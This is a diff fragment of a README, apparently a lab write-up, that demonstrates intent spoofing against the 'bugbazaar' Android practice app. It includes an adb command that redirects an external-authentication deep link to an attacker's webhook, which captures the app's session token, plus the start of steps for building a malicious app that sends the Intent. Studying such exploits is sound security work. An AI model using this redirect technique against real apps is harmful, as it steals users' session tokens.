h1-squirtle/IntentSpoofing/README.md

 	- adb shell am start -d "bugbazaar://externalAuthentication" --es ExternalAuthLoginActivity.EXTRA_REDIRECT_URL https://webhookurl
 7. Add your webhook url here and check the logs of webhook.
 You can see the _sid_ token.
 8. To exploit this vulnerability via other app, create a new android project with empty activity.
-9. In MainActivity.java, add following code
+9. In MainActivity.java, add following code under onCreate method:

         // Create a new Intent
         Intent intent = new Intent();